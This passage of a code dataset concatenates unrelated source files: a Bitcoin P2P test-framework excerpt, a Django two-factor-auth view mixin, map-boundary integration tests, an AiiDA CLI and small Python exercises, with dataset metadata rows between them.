return create_conn
# Message receiving methods
def on_message(self, message):
with mininode_lock:
try:
command = message.command.decode('ascii')
self.message_count[command] += 1
self.last_message[command] = message
getattr(self, 'on_' + command)(message)
except:
print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0]))
raise
# Callback methods. Can be overridden by subclasses in individual test
# cases to provide custom message handling behaviour.
def on_open(self):
pass
def on_close(self):
pass
def on_addr(self, message): pass
def on_block(self, message): pass
def on_blocktxn(self, message): pass
def on_cmpctblock(self, message): pass
def on_feefilter(self, message): pass
def on_getaddr(self, message): pass
def on_getblocks(self, message): pass
def on_getblocktxn(self, message): pass
def on_getdata(self, message): pass
def on_getheaders(self, message): pass
def on_headers(self, message): pass
def on_mempool(self, message): pass
def on_notfound(self, message): pass
def on_pong(self, message): pass
def on_reject(self, message): pass
def on_sendcmpct(self, message): pass
def on_sendheaders(self, message): pass
def on_tx(self, message): pass
def on_inv(self, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
self.send_message(want)
def on_ping(self, message):
self.send_message(msg_pong(message.nonce))
def on_verack(self, message):
pass
def on_version(self, message):
assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED)
self.send_message(msg_verack())
self.nServices = message.nServices
# Connection helper methods
def wait_for_disconnect(self, timeout=60):
test_function = lambda: not self.is_connected
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message receiving helper methods
def wait_for_tx(self, txid, timeout=60):
def test_function():
if not self.last_message.get('tx'):
return False
return self.last_message['tx'].tx.rehash() == txid
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block(self, blockhash, timeout=60):
test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_header(self, blockhash, timeout=60):
def test_function():
last_headers = self.last_message.get('headers')
if not last_headers:
return False
return last_headers.headers[0].rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getdata(self, timeout=60):
test_function = lambda: self.last_message.get("getdata")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getheaders(self, timeout=60):
test_function = lambda: self.last_message.get("getheaders")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_inv(self, expected_inv, timeout=60):
if len(expected_inv) > 1:
raise NotImplementedError("wait_for_inv() will only verify the first inv object")
test_function = lambda: self.last_message.get("inv") and \
self.last_message["inv"].inv[0].type == expected_inv[0].type and \
self.last_message["inv"].inv[0].hash == expected_inv[0].hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_verack(self, timeout=60):
test_function = lambda: self.message_count["verack"]
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message sending helper functions
def send_and_ping(self, message, timeout=60):
self.send_message(message)
self.sync_with_ping(timeout=timeout)
# Sync up with the node
def sync_with_ping(self, timeout=60):
self.send_message(msg_ping(nonce=self.ping_counter))
test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter
wait_until(test_function, timeout=timeout, lock=mininode_lock)
self.ping_counter += 1
# One lock for synchronizing all data access between the network event loop (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# P2PConnection acquires this lock whenever delivering a message to a P2PInterface.
# This lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the P2PInterface or P2PConnection.
mininode_lock = threading.RLock()
class NetworkThread(threading.Thread):
network_event_loop = None
def __init__(self):
super().__init__(name="NetworkThread")
# There is only one event loop and no more than one thread must be created
assert not self.network_event_loop
NetworkThread.network_event_loop = asyncio.new_event_loop()
def run(self):
self.network_event_loop.run_forever()
def close(self, timeout=10):
self.network_event_loop.call_soon_threadsafe(self.network_event_loop.stop)
wait_until(lambda: not self.network_event_loop.is_running(), timeout=timeout)
self.network_event_loop.close()
self.join(timeout)
class P2PDataStore(P2PInterface):
def __init__(self):
super().__init__()
# store of blocks. key is block hash, value is a CBlock object
self.block_store = {}
self.last_block_hash = ''
# store of txs. key is txid, value is a CTransaction object
self.tx_store = {}
self.getdata_requests = []
def on_getdata(self, message):
for inv in message.inv:
self.getdata_requests.append(inv.hash)
if (inv.type & MSG_TYPE_MASK) == MSG_TX and inv.hash in self.tx_store.keys():
self.send_message(msg_tx(self.tx_store[inv.hash]))
elif (inv.type & MSG_TYPE_MASK) == MSG_BLOCK and inv.hash in self.block_store.keys():
self.send_message(msg_block(self.block_store[inv.hash]))
else:
logger.debug('getdata message type {} received.'.format(hex(inv.type)))
def on_getheaders(self, message):
locator, hash_stop = message.locator, message.hashstop
# Assume that the most recent block added is the tip
if not self.block_store:
return
headers_list = [self.block_store[self.last_block_hash]]
maxheaders = 2000
while headers_list[-1].sha256 not in locator.vHave:
# Walk back through the block store, adding headers to headers_list
# as we go.
prev_block_hash = headers_list[-1].hashPrevBlock
if prev_block_hash in self.block_store:
prev_block_header = CBlockHeader(self.block_store[prev_block_hash])
headers_list.append(prev_block_header)
if prev_block_header.sha256 == hash_stop:
# if this is the hashstop header, stop here
break
else:
logger.debug('block hash {} not found in block store'.format(hex(prev_block_hash)))
break
# Truncate the list if there are too many headers
headers_list = headers_list[:-maxheaders - 1:-1]
response = msg_headers(headers_list)
if response is not None:
self.send_message(response)
def send_blocks_and_test(self, blocks, node, *, success=True, force_send=False, reject_reason=None, expect_disconnect=False, timeout=60):
with mininode_lock:
for block in blocks:
self.block_store[block.sha256] = block
self.last_block_hash = block.sha256
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
if force_send:
for b in blocks:
self.send_message(msg_block(block=b))
else:
self.send_message(msg_headers([CBlockHeader(blocks[-1])]))
wait_until(lambda: blocks[-1].sha256 in self.getdata_requests, timeout=timeout, lock=mininode_lock)
if expect_disconnect:
self.wait_for_disconnect(timeout=timeout)
else:
self.sync_with_ping(timeout=timeout)
if success:
wait_until(lambda: node.getbestblockhash() == blocks[-1].hash, timeout=timeout)
else:
assert node.getbestblockhash() != blocks[-1].hash
def send_txs_and_test(self, txs, node, *, success=True, expect_disconnect=False, reject_reason=None):
with mininode_lock:
for tx in txs:
self.tx_store[tx.sha256] = tx
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
for tx in txs:
self.send_message(msg_tx(tx))
if expect_disconnect:
self.wait_for_disconnect()
else:
self.sync_with_ping()
raw_mempool = node.getrawmempool()
if success:
# Check that all txs are now in the mempool
for tx in txs:
assert tx.hash in raw_mempool, "{} not found in mempool".format(tx.hash)
else:
# Check that none of the txs are now in the mempool
for tx in txs:
assert tx.hash not in raw_mempool, "{} tx found in mempool".format(tx.hash)
| true | true |
f7326e08422672f437abdf740d0fd756aaca9b7e | 2,935 | py | Python | two_factor/views/mixins.py | Bassel2387/django-two-factor-auth | e69d9a7fa289a0289e6fc42f4f9cea632e01132d | [
"MIT"
] | 65 | 2021-12-30T16:58:11.000Z | 2022-03-28T21:36:51.000Z | two_factor/views/mixins.py | Bassel2387/django-two-factor-auth | e69d9a7fa289a0289e6fc42f4f9cea632e01132d | [
"MIT"
] | 68 | 2021-12-29T19:48:40.000Z | 2022-03-31T10:51:12.000Z | two_factor/views/mixins.py | Bassel2387/django-two-factor-auth | e69d9a7fa289a0289e6fc42f4f9cea632e01132d | [
"MIT"
] | 21 | 2021-12-30T16:58:14.000Z | 2022-03-30T07:10:23.000Z | from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.urls import reverse
from ..utils import default_device
class OTPRequiredMixin:
"""
View mixin which verifies that the user logged in using OTP.
.. note::
This mixin should be the left-most base class.
"""
raise_anonymous = False
"""
Whether to raise PermissionDenied if the user isn't logged in.
"""
login_url = None
"""
If :attr:`raise_anonymous` is set to `False`, this defines where the user
will be redirected to. Defaults to ``two_factor:login``.
"""
redirect_field_name = REDIRECT_FIELD_NAME
"""
URL query name to use for providing the destination URL.
"""
raise_unverified = False
"""
Whether to raise PermissionDenied if the user isn't verified.
"""
verification_url = None
"""
If :attr:`raise_unverified` is set to `False`, this defines where the user
will be redirected to. If set to ``None``, an explanation will be shown to
the user on why access was denied.
"""
def get_login_url(self):
"""
Returns login url to redirect to.
"""
return self.login_url and str(self.login_url) or reverse('two_factor:login')
def get_verification_url(self):
"""
Returns verification url to redirect to.
"""
return self.verification_url and str(self.verification_url)
def dispatch(self, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated or \
(not request.user.is_verified() and default_device(request.user)):
# If the user has not authenticated raise or redirect to the login
# page. Also if the user just enabled two-factor authentication and
# has not yet logged in since should also have the same result. If
# the user receives a 'you need to enable TFA' by now, he gets
# confuses as TFA has just been enabled. So we either raise or
# redirect to the login page.
if self.raise_anonymous:
raise PermissionDenied()
else:
return redirect_to_login(request.get_full_path(), self.get_login_url())
if not request.user.is_verified():
if self.raise_unverified:
raise PermissionDenied()
elif self.get_verification_url():
return redirect_to_login(request.get_full_path(), self.get_verification_url())
else:
return TemplateResponse(
request=request,
template='two_factor/core/otp_required.html',
status=403,
)
return super().dispatch(request, *args, **kwargs)
| 35.361446 | 94 | 0.639864 | from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.urls import reverse
from ..utils import default_device
class OTPRequiredMixin:
raise_anonymous = False
login_url = None
redirect_field_name = REDIRECT_FIELD_NAME
raise_unverified = False
verification_url = None
def get_login_url(self):
return self.login_url and str(self.login_url) or reverse('two_factor:login')
def get_verification_url(self):
return self.verification_url and str(self.verification_url)
def dispatch(self, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated or \
(not request.user.is_verified() and default_device(request.user)):
if self.raise_anonymous:
raise PermissionDenied()
else:
return redirect_to_login(request.get_full_path(), self.get_login_url())
if not request.user.is_verified():
if self.raise_unverified:
raise PermissionDenied()
elif self.get_verification_url():
return redirect_to_login(request.get_full_path(), self.get_verification_url())
else:
return TemplateResponse(
request=request,
template='two_factor/core/otp_required.html',
status=403,
)
return super().dispatch(request, *args, **kwargs)
| true | true |
f7326f3839bbb8c4d87f6e6f1636403646f0f7c4 | 6,253 | py | Python | integration-test/992-boundaries-min_zoom-and-name.py | nzjony/vector-datasource | 926555904cf44da06380d808fdc16f4b992bde1f | [
"MIT"
] | null | null | null | integration-test/992-boundaries-min_zoom-and-name.py | nzjony/vector-datasource | 926555904cf44da06380d808fdc16f4b992bde1f | [
"MIT"
] | null | null | null | integration-test/992-boundaries-min_zoom-and-name.py | nzjony/vector-datasource | 926555904cf44da06380d808fdc16f4b992bde1f | [
"MIT"
] | null | null | null | from . import FixtureTest
class BoundariesMinZoomAndNameNe(FixtureTest):
# global:
# # NOTE: Natural Earth 1:50 million used zooms 0,1,2,3,4
# # and only has USA, Canada, Brazil, and Australia
# # all with scalerank of 2 (a documented NE omission).
# # Then 1:10 million NE is selected at zooms 5, 6, 7
# # and includes most all countries, with various scalerank
# # but is inconsistent with 1:50 in scalerank=2 so countries
# # like Russia will "pop" in at 5, but with min_zoom of 2
# # (and India, China, Indonesia, and South Africa).
# - &ne_region_boundaries_min_zoom |
# CASE WHEN scalerank = 0 THEN 6.7
# WHEN scalerank <= 2 THEN 2
# WHEN scalerank <= 3 THEN 3
# WHEN scalerank <= 4 THEN 5
# WHEN scalerank <= 5 THEN 5.5
# WHEN scalerank <= 6 THEN 6
# WHEN scalerank <= 7 THEN 6.7
# WHEN scalerank <= 8 THEN 6.8
# WHEN scalerank <= 9 THEN 7
# END
def test_england_wales_boundary(self):
# England-Wales boundary in United Kingdom (scalerank=4, 1:10m NE
# only)
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_0_boundary_lines_map_units/'
'992-ne_10m_admin_0_boundary_lines_map_units_eng_wales.shp',
])
self.assert_has_feature(
5, 15, 10, 'boundaries',
{'kind': 'map_unit', 'min_zoom': 5, 'sort_rank': 258})
def test_usa_region(self):
# region min_zoom (via scalerank)
# USA region (scalerank=2, 1:50m NE and 1:10m NE)
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_1_states_provinces_lines/'
'992-ne_10m_admin_1_states_provinces_lines-nv-ca-'
'europe-mexico.shp',
])
self.assert_has_feature(
2, 0, 1, 'boundaries',
{'kind': 'region', 'min_zoom': 2})
# USA region NO name, Natural Earth
self.assert_has_feature(
2, 0, 1, 'boundaries',
{'kind': 'region', 'name': type(None)})
def test_10m_regions(self):
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_1_states_provinces_lines/'
'992-ne_10m_admin_1_states_provinces_lines-nv-ca'
'-europe-mexico.shp',
])
# Germany region (scalerank=3, 1:10m NE only)
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'min_zoom': 3})
# Germany region NO name, Natural Earth
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'name': type(None)})
# Mexico region (scalerank=4, 1:10m NE only)
self.assert_has_feature(
5, 7, 14, 'boundaries',
{'kind': 'region', 'min_zoom': 5})
# Mexico region NO name, Natural Earth
self.assert_has_feature(
5, 7, 14, 'boundaries',
{'kind': 'region', 'name': type(None)})
# Poland region (scalerank=5, 1:10m NE only)
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'min_zoom': 5.5})
# Poland region NO name, Natural Earth
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'name': type(None)})
# Austria region (scalerank=6, 1:10m NE only)
self.assert_has_feature(
6, 34, 22, 'boundaries',
{'kind': 'region', 'min_zoom': 6})
# Austria region NO name, Natural Earth
self.assert_has_feature(
6, 34, 22, 'boundaries',
{'kind': 'region', 'name': type(None)})
# Austria region HAS name, Natural Earth
self.assert_has_feature(
7, 68, 44, 'boundaries',
{'kind': 'region', 'name': 'Tirol - Salzburg'})
# Sweden region (scalerank=7, 1:10m NE only)
self.assert_has_feature(
6, 35, 18, 'boundaries',
{'kind': 'region', 'min_zoom': 6.7})
# United Kingdom region (scalerank=8, 1:10m NE only)
self.assert_has_feature(
6, 31, 18, 'boundaries',
{'kind': 'region', 'min_zoom': 6.8})
# Switzerland region (scalerank=9, 1:10m NE only)
self.assert_has_feature(
7, 66, 44, 'boundaries',
{'kind': 'region', 'min_zoom': 7})
class BoundariesMinZoomAndNameOsm(FixtureTest):
def test_region_boundary_zug_luzern_z8(self):
# Switzerland region HAS NO name, OpenStreetMap
self.load_fixtures([
'http://www.openstreetmap.org/relation/1686447',
'http://www.openstreetmap.org/relation/1685677',
], clip=self.tile_bbox(8, 133, 89))
# test that the regional boundary is present at zoom 8, although it
# should have had its name stripped off, since it's very short.
self.assert_has_feature(
8, 133, 89, 'boundaries',
{'kind': 'region', 'name': type(None)})
def test_region_boundary_zug_luzern_z12(self):
# Switzerland region HAS name, OpenStreetMap
# do this at z12, as the boundary between Zug and Luzern is quite
# short, and we want enough space to label.
self.load_fixtures([
'http://www.openstreetmap.org/relation/1686447',
'http://www.openstreetmap.org/relation/1685677',
], clip=self.tile_bbox(12, 2144, 1438))
# name should be present at zoom 12
self.assert_has_feature(
12, 2144, 1438, 'boundaries',
{'kind': 'region', 'name': 'Zug - Luzern'})
def test_region_boundary_salzburg_tirol(self):
# Austria region HAS name, OpenStreetMap
self.load_fixtures([
'http://www.openstreetmap.org/relation/52343',
'http://www.openstreetmap.org/relation/86539',
], clip=self.tile_bbox(8, 136, 89))
self.assert_has_feature(
8, 136, 89, 'boundaries',
{'kind': 'region', 'name': 'Salzburg - Tirol'})
| 37.89697 | 75 | 0.565009 | from . import FixtureTest
class BoundariesMinZoomAndNameNe(FixtureTest):
'min_zoom': 5, 'sort_rank': 258})
def test_usa_region(self):
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_1_states_provinces_lines/'
'992-ne_10m_admin_1_states_provinces_lines-nv-ca-'
'europe-mexico.shp',
])
self.assert_has_feature(
2, 0, 1, 'boundaries',
{'kind': 'region', 'min_zoom': 2})
self.assert_has_feature(
2, 0, 1, 'boundaries',
{'kind': 'region', 'name': type(None)})
def test_10m_regions(self):
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_1_states_provinces_lines/'
'992-ne_10m_admin_1_states_provinces_lines-nv-ca'
'-europe-mexico.shp',
])
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'min_zoom': 3})
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
5, 7, 14, 'boundaries',
{'kind': 'region', 'min_zoom': 5})
self.assert_has_feature(
5, 7, 14, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'min_zoom': 5.5})
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
6, 34, 22, 'boundaries',
{'kind': 'region', 'min_zoom': 6})
self.assert_has_feature(
6, 34, 22, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
7, 68, 44, 'boundaries',
{'kind': 'region', 'name': 'Tirol - Salzburg'})
self.assert_has_feature(
6, 35, 18, 'boundaries',
{'kind': 'region', 'min_zoom': 6.7})
self.assert_has_feature(
6, 31, 18, 'boundaries',
{'kind': 'region', 'min_zoom': 6.8})
self.assert_has_feature(
7, 66, 44, 'boundaries',
{'kind': 'region', 'min_zoom': 7})
class BoundariesMinZoomAndNameOsm(FixtureTest):
def test_region_boundary_zug_luzern_z8(self):
self.load_fixtures([
'http://www.openstreetmap.org/relation/1686447',
'http://www.openstreetmap.org/relation/1685677',
], clip=self.tile_bbox(8, 133, 89))
self.assert_has_feature(
8, 133, 89, 'boundaries',
{'kind': 'region', 'name': type(None)})
def test_region_boundary_zug_luzern_z12(self):
# Switzerland region HAS name, OpenStreetMap
# do this at z12, as the boundary between Zug and Luzern is quite
# short, and we want enough space to label.
self.load_fixtures([
'http://www.openstreetmap.org/relation/1686447',
'http://www.openstreetmap.org/relation/1685677',
], clip=self.tile_bbox(12, 2144, 1438))
# name should be present at zoom 12
self.assert_has_feature(
12, 2144, 1438, 'boundaries',
{'kind': 'region', 'name': 'Zug - Luzern'})
def test_region_boundary_salzburg_tirol(self):
# Austria region HAS name, OpenStreetMap
self.load_fixtures([
'http://www.openstreetmap.org/relation/52343',
'http://www.openstreetmap.org/relation/86539',
], clip=self.tile_bbox(8, 136, 89))
self.assert_has_feature(
8, 136, 89, 'boundaries',
{'kind': 'region', 'name': 'Salzburg - Tirol'})
| true | true |
f7326f9a88e0ca06be5f06f02185b9b5198aa58c | 1,631 | py | Python | aiida_abinit/cli.py | gpetretto/aiida-abinit | bdbfd770eecb44a0b864bdee1d282eab92f7913d | [
"MIT"
] | null | null | null | aiida_abinit/cli.py | gpetretto/aiida-abinit | bdbfd770eecb44a0b864bdee1d282eab92f7913d | [
"MIT"
] | null | null | null | aiida_abinit/cli.py | gpetretto/aiida-abinit | bdbfd770eecb44a0b864bdee1d282eab92f7913d | [
"MIT"
] | null | null | null | """
Command line interface (cli) for aiida_abinit.
Register new commands either via the "console_scripts" entry point or plug them
directly into the 'verdi' command by using AiiDA-specific entry points like
"aiida.cmdline.data" (both in the setup.json file).
"""
import sys
import click
from aiida.cmdline.utils import decorators
from aiida.cmdline.commands.cmd_data import verdi_data
from aiida.cmdline.params.types import DataParamType
# See aiida.cmdline.data entry point in setup.json
@verdi_data.group('abinit')
def data_cli():
"""Command line interface for aiida-abinit"""
@data_cli.command('list')
@decorators.with_dbenv()
def list_(): # pylint: disable=redefined-builtin
"""
Display all DiffParameters nodes
"""
from aiida.orm import QueryBuilder
from aiida.plugins import DataFactory
DiffParameters = DataFactory('abinit')
qb = QueryBuilder()
qb.append(DiffParameters)
results = qb.all()
s = ""
for result in results:
obj = result[0]
s += "{}, pk: {}\n".format(str(obj), obj.pk)
sys.stdout.write(s)
@data_cli.command('export')
@click.argument('node', metavar='IDENTIFIER', type=DataParamType())
@click.option('--outfile',
'-o',
type=click.Path(dir_okay=False),
help='Write output to file (default: print to stdout).')
@decorators.with_dbenv()
def export(node, outfile):
"""Export a DiffParameters node (identified by PK, UUID or label) to plain text."""
string = str(node)
if outfile:
with open(outfile, 'w') as f:
f.write(string)
else:
click.echo(string)
| 27.644068 | 87 | 0.676885 |
import sys
import click
from aiida.cmdline.utils import decorators
from aiida.cmdline.commands.cmd_data import verdi_data
from aiida.cmdline.params.types import DataParamType
@verdi_data.group('abinit')
def data_cli():
@data_cli.command('list')
@decorators.with_dbenv()
def list_():
from aiida.orm import QueryBuilder
from aiida.plugins import DataFactory
DiffParameters = DataFactory('abinit')
qb = QueryBuilder()
qb.append(DiffParameters)
results = qb.all()
s = ""
for result in results:
obj = result[0]
s += "{}, pk: {}\n".format(str(obj), obj.pk)
sys.stdout.write(s)
@data_cli.command('export')
@click.argument('node', metavar='IDENTIFIER', type=DataParamType())
@click.option('--outfile',
'-o',
type=click.Path(dir_okay=False),
help='Write output to file (default: print to stdout).')
@decorators.with_dbenv()
def export(node, outfile):
string = str(node)
if outfile:
with open(outfile, 'w') as f:
f.write(string)
else:
click.echo(string)
| true | true |
f73270246396d797d875be406506d2f9147d1917 | 390 | py | Python | src/CursoEmvideo/ex052.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex052.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex052.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | num = int(input('Digite um número: '))
tot = 0
for c in range(1, num + 1):
if num % c == 0:
print('\33[33m', end='')
tot += 1
else:
print('\33[31m', end='')
print('{} '.format(c), end='')
print('\n\033[mO número {} foi divisível {} vezes'.format(num, tot))
if tot == 2:
print('E por isso ele É PRIMO!')
else:
print('E por isoo ele NÃO É PRIMO!')
| 26 | 68 | 0.523077 | num = int(input('Digite um número: '))
tot = 0
for c in range(1, num + 1):
if num % c == 0:
print('\33[33m', end='')
tot += 1
else:
print('\33[31m', end='')
print('{} '.format(c), end='')
print('\n\033[mO número {} foi divisível {} vezes'.format(num, tot))
if tot == 2:
print('E por isso ele É PRIMO!')
else:
print('E por isoo ele NÃO É PRIMO!')
| true | true |
f732708b48f8553877cd926c4f63a2d192d32cb7 | 5,209 | py | Python | groceries.py | ktg269/groceries-home | 338c40c6b7ad513bb8dd2a07d14133e7bac3427d | [
"MIT"
] | 1 | 2019-06-11T03:06:38.000Z | 2019-06-11T03:06:38.000Z | groceries.py | ktg269/groceries-home | 338c40c6b7ad513bb8dd2a07d14133e7bac3427d | [
"MIT"
] | null | null | null | groceries.py | ktg269/groceries-home | 338c40c6b7ad513bb8dd2a07d14133e7bac3427d | [
"MIT"
] | null | null | null | # groceries.py
products = [
{"id":1, "name": "Chocolate Sandwich Cookies", "department": "snacks", "aisle": "cookies cakes", "price": 3.50},
{"id":2, "name": "All-Seasons Salt", "department": "pantry", "aisle": "spices seasonings", "price": 4.99},
{"id":3, "name": "Robust Golden Unsweetened Oolong Tea", "department": "beverages", "aisle": "tea", "price": 2.49},
{"id":4, "name": "Smart Ones Classic Favorites Mini Rigatoni With Vodka Cream Sauce", "department": "frozen", "aisle": "frozen meals", "price": 6.99},
{"id":5, "name": "Green Chile Anytime Sauce", "department": "pantry", "aisle": "marinades meat preparation", "price": 7.99},
{"id":6, "name": "Dry Nose Oil", "department": "personal care", "aisle": "cold flu allergy", "price": 21.99},
{"id":7, "name": "Pure Coconut Water With Orange", "department": "beverages", "aisle": "juice nectars", "price": 3.50},
{"id":8, "name": "Cut Russet Potatoes Steam N' Mash", "department": "frozen", "aisle": "frozen produce", "price": 4.25},
{"id":9, "name": "Light Strawberry Blueberry Yogurt", "department": "dairy eggs", "aisle": "yogurt", "price": 6.50},
{"id":10, "name": "Sparkling Orange Juice & Prickly Pear Beverage", "department": "beverages", "aisle": "water seltzer sparkling water", "price": 2.99},
{"id":11, "name": "Peach Mango Juice", "department": "beverages", "aisle": "refrigerated", "price": 1.99},
{"id":12, "name": "Chocolate Fudge Layer Cake", "department": "frozen", "aisle": "frozen dessert", "price": 18.50},
{"id":13, "name": "Saline Nasal Mist", "department": "personal care", "aisle": "cold flu allergy", "price": 16.00},
{"id":14, "name": "Fresh Scent Dishwasher Cleaner", "department": "household", "aisle": "dish detergents", "price": 4.99},
{"id":15, "name": "Overnight Diapers Size 6", "department": "babies", "aisle": "diapers wipes", "price": 25.50},
{"id":16, "name": "Mint Chocolate Flavored Syrup", "department": "snacks", "aisle": "ice cream toppings", "price": 4.50},
{"id":17, "name": "Rendered Duck Fat", "department": "meat seafood", "aisle": "poultry counter", "price": 9.99},
{"id":18, "name": "Pizza for One Suprema Frozen Pizza", "department": "frozen", "aisle": "frozen pizza", "price": 12.50},
{"id":19, "name": "Gluten Free Quinoa Three Cheese & Mushroom Blend", "department": "dry goods pasta", "aisle": "grains rice dried goods", "price": 3.99},
{"id":20, "name": "Pomegranate Cranberry & Aloe Vera Enrich Drink", "department": "beverages", "aisle": "juice nectars", "price": 4.25}
] # based on data from Instacart: https://www.instacart.com/datasets/grocery-shopping-2017
# product part 1
# --------------
# THERE ARE 20 PRODUCTS:
# --------------
# + All-Seasons Salt ($4.99)
# + Chocolate Fudge Layer Cake ($18.50)
# + Chocolate Sandwich Cookies ($3.50)
# + Cut Russet Potatoes Steam N' Mash ($4.25)
# + Dry Nose Oil ($21.99)
# + Fresh Scent Dishwasher Cleaner ($4.99)
# + Gluten Free Quinoa Three Cheese & Mushroom Blend ($3.99)
# + Green Chile Anytime Sauce ($7.99)
# + Light Strawberry Blueberry Yogurt ($6.50)
# + Mint Chocolate Flavored Syrup ($4.50)
# + Overnight Diapers Size 6 ($25.50)
# + Peach Mango Juice ($1.99)
# + Pizza For One Suprema Frozen Pizza ($12.50)
# + Pomegranate Cranberry & Aloe Vera Enrich Drink ($4.25)
# + Pure Coconut Water With Orange ($3.50)
# + Rendered Duck Fat ($9.99)
# + Robust Golden Unsweetened Oolong Tea ($2.49)
# + Saline Nasal Mist ($16.00)
# + Smart Ones Classic Favorites Mini Rigatoni With Vodka Cream Sauce ($6.99)
# + Sparkling Orange Juice & Prickly Pear Beverage ($2.99)
products_count = len(products)
print("----------------------")
print("THERE ARE " + str(products_count) + " PRODUCTS:")
print("----------------------")
def sort_by_name(any_product):
return any_product["name"]
sorted_products = sorted(products, key=sort_by_name)
for p in sorted_products:
#print(p["name"])
#price_usd = p["price"]
price_usd = " (${0:.2f})".format(p["price"])
print("..." + p["name"] + price_usd)
#
# DEPARTMENTS (PART 2)
#
# --------------
# THERE ARE 10 DEPARTMENTS:
# --------------
# + Babies (1 product)
# + Beverages (5 products)
# + Dairy Eggs (1 product)
# + Dry Goods Pasta (1 product)
# + Frozen (4 products)
# + Household (1 product)
# + Meat Seafood (1 product)
# + Pantry (2 products)
# + Personal Care (2 products)
# + Snacks (2 products)
departments = []
for p in products:
#print(p["department"])
departments.append(p["department"])
#if p["department"] not in departments:
# departments.append(p["department"])
unique_departments = list(set(departments))
department_count = len(unique_departments)
print("--------------")
print("THERE ARE " + str(department_count) + " DEPARTMENTS:")
print("--------------")
unique_departments.sort()
for d in unique_departments:
matching_products = [p for p in products if p["department"] ==d]
matching_products_count = len(matching_products)
if matching_products_count >1:
label = "products"
else:
label = "product"
print(" + " + d.title() + " (" + str(matching_products_count) + " " + label + ")")
| 41.672 | 158 | 0.623344 |
products = [
{"id":1, "name": "Chocolate Sandwich Cookies", "department": "snacks", "aisle": "cookies cakes", "price": 3.50},
{"id":2, "name": "All-Seasons Salt", "department": "pantry", "aisle": "spices seasonings", "price": 4.99},
{"id":3, "name": "Robust Golden Unsweetened Oolong Tea", "department": "beverages", "aisle": "tea", "price": 2.49},
{"id":4, "name": "Smart Ones Classic Favorites Mini Rigatoni With Vodka Cream Sauce", "department": "frozen", "aisle": "frozen meals", "price": 6.99},
{"id":5, "name": "Green Chile Anytime Sauce", "department": "pantry", "aisle": "marinades meat preparation", "price": 7.99},
{"id":6, "name": "Dry Nose Oil", "department": "personal care", "aisle": "cold flu allergy", "price": 21.99},
{"id":7, "name": "Pure Coconut Water With Orange", "department": "beverages", "aisle": "juice nectars", "price": 3.50},
{"id":8, "name": "Cut Russet Potatoes Steam N' Mash", "department": "frozen", "aisle": "frozen produce", "price": 4.25},
{"id":9, "name": "Light Strawberry Blueberry Yogurt", "department": "dairy eggs", "aisle": "yogurt", "price": 6.50},
{"id":10, "name": "Sparkling Orange Juice & Prickly Pear Beverage", "department": "beverages", "aisle": "water seltzer sparkling water", "price": 2.99},
{"id":11, "name": "Peach Mango Juice", "department": "beverages", "aisle": "refrigerated", "price": 1.99},
{"id":12, "name": "Chocolate Fudge Layer Cake", "department": "frozen", "aisle": "frozen dessert", "price": 18.50},
{"id":13, "name": "Saline Nasal Mist", "department": "personal care", "aisle": "cold flu allergy", "price": 16.00},
{"id":14, "name": "Fresh Scent Dishwasher Cleaner", "department": "household", "aisle": "dish detergents", "price": 4.99},
{"id":15, "name": "Overnight Diapers Size 6", "department": "babies", "aisle": "diapers wipes", "price": 25.50},
{"id":16, "name": "Mint Chocolate Flavored Syrup", "department": "snacks", "aisle": "ice cream toppings", "price": 4.50},
{"id":17, "name": "Rendered Duck Fat", "department": "meat seafood", "aisle": "poultry counter", "price": 9.99},
